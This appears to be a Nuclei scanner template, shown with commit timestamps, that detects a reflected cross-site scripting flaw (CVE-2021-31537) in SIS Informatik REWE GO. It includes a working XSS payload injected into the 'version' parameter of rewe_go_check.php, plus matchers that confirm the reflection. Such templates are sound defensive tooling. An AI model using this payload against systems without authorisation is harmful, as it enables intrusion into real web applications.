2021-05-12 20:23:19 +00:00
id : CVE-2021-31537
info :
2022-08-29 13:55:23 +00:00
name : SIS Informatik REWE GO SP17 <7.7 - Cross-Site Scripting
2021-05-12 20:23:19 +00:00
author : geeknik
severity : medium
2022-08-29 13:55:23 +00:00
description : SIS Informatik REWE GO SP17 before 7.7 contains a cross-site scripting vulnerability via rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters).
2022-04-22 10:38:41 +00:00
reference :
- https://sec-consult.com/vulnerability-lab/advisory/reflected-xss-sis-infromatik-rewe-go-cve-2021-31537/
2022-05-17 09:18:12 +00:00
- http://seclists.org/fulldisclosure/2021/May/20
- https://sisinformatik.com/rewe-go/
2022-08-29 13:55:23 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-31537
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-31537
cwe-id : CWE-79
2022-08-27 04:41:18 +00:00
tags : cve,cve2021,xss,seclists
2021-05-12 20:25:22 +00:00
2021-05-12 20:23:19 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707"
matchers-condition : and
matchers :
- type : word
part : body
words :
2021-05-12 20:27:33 +00:00
- "<script>confirm({{randstr}})</script>"
2021-05-14 16:45:50 +00:00
- "SIS-REWE"
condition : and
2021-05-12 20:23:19 +00:00
- type : word
part : header
words :
- "text/html"
2022-08-29 13:55:23 +00:00
# Enhanced by mp on 2022/08/28